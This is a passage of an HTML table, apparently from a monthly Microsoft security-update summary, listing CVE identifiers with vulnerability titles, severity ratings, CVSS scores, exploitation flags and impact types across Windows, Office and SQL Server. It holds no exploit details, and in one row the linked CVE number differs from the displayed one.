  <td>No</td>
  <td>No</td>
  <td>Info</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32631">CVE-2026-23653 *</a></td>
  <td> GitHub: CVE-2026-32631 'git clone' from manipulated repositories can leak NTLM hashes </td>
  <td>Important</td>
  <td>7.4</td>
  <td>No</td>
  <td>No</td>
  <td>Info</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33096">CVE-2026-33096</a></td>
  <td>HTTP.sys Denial of Service Vulnerability</td>
  <td>Important</td>
  <td>7.5</td>
  <td>No</td>
  <td>No</td>
  <td>DoS</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-25250">CVE-2026-25250 *</a></td>
  <td>MITRE: CVE-2026-25250 Secure Boot disable Eazy Fix</td>
  <td>Important</td>
  <td>6</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26181">CVE-2026-26181</a></td>
  <td>Microsoft Brokering File System Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32219">CVE-2026-32219</a></td>
  <td>Microsoft Brokering File System Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32091">CVE-2026-32091</a></td>
  <td>Microsoft Brokering File System Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>8.4</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26152">CVE-2026-26152</a></td>
  <td>Microsoft Cryptographic Services Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33103">CVE-2026-33103</a></td>
  <td>Microsoft Dynamics 365 (On-Premises) Information Disclosure Vulnerability</td>
  <td>Important</td>
  <td>5.5</td>
  <td>No</td>
  <td>No</td>
  <td>Info</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32188">CVE-2026-32188</a></td>
  <td>Microsoft Excel Information Disclosure Vulnerability</td>
  <td>Important</td>
  <td>7.1</td>
  <td>No</td>
  <td>No</td>
  <td>Info</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32189">CVE-2026-32189</a></td>
  <td>Microsoft Excel Remote Code Execution Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32197">CVE-2026-32197</a></td>
  <td>Microsoft Excel Remote Code Execution Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32198">CVE-2026-32198</a></td>
  <td>Microsoft Excel Remote Code Execution Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32199">CVE-2026-32199</a></td>
  <td>Microsoft Excel Remote Code Execution Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32184">CVE-2026-32184</a></td>
  <td>Microsoft High Performance Compute (HPC) Pack Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26155">CVE-2026-26155</a></td>
  <td>Microsoft Local Security Authority Subsystem Service Information Disclosure Vulnerability</td>
  <td>Important</td>
  <td>6.5</td>
  <td>No</td>
  <td>No</td>
  <td>Info</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27914">CVE-2026-27914</a></td>
  <td>Microsoft Management Console Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26149">CVE-2026-26149</a></td>
  <td>Microsoft Power Apps Security Feature Bypass</td>
  <td>Important</td>
  <td>9</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32200">CVE-2026-32200</a></td>
  <td>Microsoft PowerPoint Remote Code Execution Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26143">CVE-2026-26143</a></td>
  <td>Microsoft PowerShell Security Feature Bypass Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33120">CVE-2026-33120 †</a></td>
  <td>Microsoft SQL Server Remote Code Execution Vulnerability</td>
  <td>Important</td>
  <td>8.8</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20945">CVE-2026-20945</a></td>
  <td>Microsoft SharePoint Server Spoofing Vulnerability</td>
  <td>Important</td>
  <td>4.6</td>
  <td>No</td>
  <td>No</td>
  <td>Spoofing</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33822">CVE-2026-33822</a></td>
  <td>Microsoft Word Information Disclosure Vulnerability</td>
  <td>Important</td>
  <td>6.1</td>
  <td>No</td>
  <td>No</td>
  <td>Info</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33095">CVE-2026-33095</a></td>
  <td>Microsoft Word Remote Code Execution Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23657">CVE-2026-23657</a></td>
  <td>Microsoft Word Remote Code Execution Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32081">CVE-2026-32081</a></td>
  <td>Package Catalog Information Disclosure Vulnerability</td>
  <td>Important</td>
  <td>5.5</td>
  <td>No</td>
  <td>No</td>
  <td>Info</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26170">CVE-2026-26170</a></td>
  <td>PowerShell Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26183">CVE-2026-26183</a></td>
  <td>Remote Access Management service/API (RPC server) Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26160">CVE-2026-26160</a></td>
  <td>Remote Desktop Licensing Service Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26159">CVE-2026-26159</a></td>
  <td>Remote Desktop Licensing Service Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26151">CVE-2026-26151</a></td>
  <td>Remote Desktop Spoofing Vulnerability</td>
  <td>Important</td>
  <td>7.1</td>
  <td>No</td>
  <td>No</td>
  <td>Spoofing</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32085">CVE-2026-32085</a></td>
  <td>Remote Procedure Call Information Disclosure Vulnerability</td>
  <td>Important</td>
  <td>5.5</td>
  <td>No</td>
  <td>No</td>
  <td>Info</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32167">CVE-2026-32167</a></td>
  <td>SQL Server Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>6.7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32176">CVE-2026-32176</a></td>
  <td>SQL Server Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>6.7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-0390">CVE-2026-0390</a></td>
  <td>UEFI Secure Boot Security Feature Bypass Vulnerability</td>
  <td>Important</td>
  <td>6.7</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32220">CVE-2026-32220</a></td>
  <td>UEFI Secure Boot Security Feature Bypass Vulnerability</td>
  <td>Important</td>
  <td>4.4</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32212">CVE-2026-32212</a></td>
  <td>Universal Plug and Play (upnp.dll) Information Disclosure Vulnerability</td>
  <td>Important</td>
  <td>5.5</td>
  <td>No</td>
  <td>No</td>
  <td>Info</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32214">CVE-2026-32214</a></td>
  <td>Universal Plug and Play (upnp.dll) Information Disclosure Vulnerability</td>
  <td>Important</td>
  <td>5.5</td>
  <td>No</td>
  <td>No</td>
  <td>Info</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32079">CVE-2026-32079</a></td>
  <td>Web Account Manager Information Disclosure Vulnerability</td>
  <td>Important</td>
  <td>5.5</td>
  <td>No</td>
  <td>No</td>
  <td>Info</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33104">CVE-2026-33104</a></td>
  <td>Win32k Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32196">CVE-2026-32196</a></td>
  <td>Windows Admin Center Spoofing Vulnerability</td>
  <td>Important</td>
  <td>6.1</td>
  <td>No</td>
  <td>No</td>
  <td>Spoofing</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26178">CVE-2026-26178</a></td>
  <td>Windows Advanced Rasterization Platform Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>8.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32073">CVE-2026-32073</a></td>
  <td>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26168">CVE-2026-26168</a></td>
  <td>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26173">CVE-2026-26173</a></td>
  <td>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26177">CVE-2026-26177</a></td>
  <td>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26182">CVE-2026-26182</a></td>
  <td>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27922">CVE-2026-27922</a></td>
  <td>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33099">CVE-2026-33099</a></td>
  <td>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33100">CVE-2026-33100</a></td>
  <td>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32088">CVE-2026-32088</a></td>
  <td>Windows Biometric Service Security Feature Bypass Vulnerability</td>
  <td>Important</td>
  <td>6.1</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27913">CVE-2026-27913</a></td>
  <td>Windows BitLocker Security Feature Bypass Vulnerability</td>
  <td>Important</td>
  <td>7.7</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26175">CVE-2026-26175</a></td>
  <td>Windows Boot Manager Security Feature Bypass Vulnerability</td>
  <td>Important</td>
  <td>4.6</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32162">CVE-2026-32162</a></td>
  <td>Windows COM Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>8.4</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20806">CVE-2026-20806</a></td>
  <td>Windows COM Server Information Disclosure Vulnerability</td>
  <td>Important</td>
  <td>5.5</td>
  <td>No</td>
  <td>No</td>
  <td>Info</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26176">CVE-2026-26176</a></td>
  <td>Windows Client Side Caching driver (csc.sys) Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27926">CVE-2026-27926</a></td>
  <td>Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32070">CVE-2026-32070</a></td>
  <td>Windows Common Log File System Driver Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33098">CVE-2026-33098</a></td>
  <td>Windows Container Isolation FS Filter Driver Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26153">CVE-2026-26153</a></td>
  <td>Windows Encrypted File System (EFS) Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32087">CVE-2026-32087</a></td>
  <td>Windows Function Discovery Service (fdwsd.dll) Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32093">CVE-2026-32093</a></td>
  <td>Windows Function Discovery Service (fdwsd.dll) Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32086">CVE-2026-32086</a></td>
  <td>Windows Function Discovery Service (fdwsd.dll) Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32150">CVE-2026-32150</a></td>
  <td>Windows Function Discovery Service (fdwsd.dll) Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27931">CVE-2026-27931</a></td>
  <td>Windows GDI Information Disclosure Vulnerability</td>
  <td>Important</td>
  <td>5.5</td>
  <td>No</td>
  <td>No</td>
  <td>Info</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27930">CVE-2026-27930</a></td>
  <td>Windows GDI Information Disclosure Vulnerability</td>
  <td>Important</td>
  <td>5.5</td>
  <td>No</td>
  <td>No</td>
  <td>Info</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32221">CVE-2026-32221</a></td>
  <td>Windows Graphics Component Remote Code Execution Vulnerability</td>
  <td>Important</td>
  <td>8.4</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27906">CVE-2026-27906</a></td>
  <td>Windows Hello Security Feature Bypass Vulnerability</td>
  <td>Important</td>
  <td>4.4</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27928">CVE-2026-27928</a></td>
  <td>Windows Hello Security Feature Bypass Vulnerability</td>
  <td>Important</td>
  <td>8.7</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26156">CVE-2026-26156</a></td>
  <td>Windows Hyper-V Remote Code Execution Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32149">CVE-2026-32149</a></td>
  <td>Windows Hyper-V Remote Code Execution Vulnerability</td>
  <td>Important</td>
  <td>7.3</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27910">CVE-2026-27910</a></td>
  <td>Windows Installer Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27912">CVE-2026-27912</a></td>
  <td>Windows Kerberos Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26179">CVE-2026-26179</a></td>
  <td>Windows Kernel Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26180">CVE-2026-26180</a></td>
  <td>Windows Kernel Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32195">CVE-2026-32195</a></td>
  <td>Windows Kernel Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26163">CVE-2026-26163</a></td>
  <td>Windows Kernel Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32215">CVE-2026-32215</a></td>
  <td>Windows Kernel Information Disclosure Vulnerability</td>
  <td>Important</td>
  <td>5.5</td>
  <td>No</td>
  <td>No</td>
  <td>Info</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32217">CVE-2026-32217</a></td>
  <td>Windows Kernel Information Disclosure Vulnerability</td>
  <td>Important</td>
  <td>5.5</td>
  <td>No</td>
  <td>No</td>
  <td>Info</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32218">CVE-2026-32218</a></td>
  <td>Windows Kernel Information Disclosure Vulnerability</td>
  <td>Important</td>
  <td>5.5</td>
  <td>No</td>
  <td>No</td>
  <td>Info</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26169">CVE-2026-26169</a></td>
  <td>Windows Kernel Memory Information Disclosure Vulnerability</td>
  <td>Important</td>
  <td>6.1</td>
  <td>No</td>
  <td>No</td>
  <td>Info</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27929">CVE-2026-27929</a></td>
  <td>Windows LUA File Virtualization Filter Driver Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32071">CVE-2026-32071</a></td>
  <td>Windows Local Security Authority Subsystem Service (LSASS) Denial of Service Vulnerability</td>
  <td>Important</td>
  <td>7.5</td>
  <td>No</td>
  <td>No</td>
  <td>DoS</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20930">CVE-2026-20930</a></td>
  <td>Windows Management Services Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26162">CVE-2026-26162</a></td>
  <td>Windows OLE Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33101">CVE-2026-33101</a></td>
  <td>Windows Print Spooler Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32084">CVE-2026-32084</a></td>
  <td>Windows Print Spooler Information Disclosure Vulnerability</td>
  <td>Important</td>
  <td>5.5</td>
  <td>No</td>
  <td>No</td>
  <td>Info</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27927">CVE-2026-27927</a></td>
  <td>Windows Projected File System Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26184">CVE-2026-26184</a></td>
  <td>Windows Projected File System Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32069">CVE-2026-32069</a></td>
  <td>Windows Projected File System Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32074">CVE-2026-32074</a></td>
  <td>Windows Projected File System Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32078">CVE-2026-32078</a></td>
  <td>Windows Projected File System Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26167">CVE-2026-26167</a></td>
  <td>Windows Push Notifications Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>8.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32158">CVE-2026-32158</a></td>
  <td>Windows Push Notifications Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32159">CVE-2026-32159</a></td>
  <td>Windows Push Notifications Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32160">CVE-2026-32160</a></td>
  <td>Windows Push Notifications Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26172">CVE-2026-26172</a></td>
  <td>Windows Push Notifications Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20928">CVE-2026-20928</a></td>
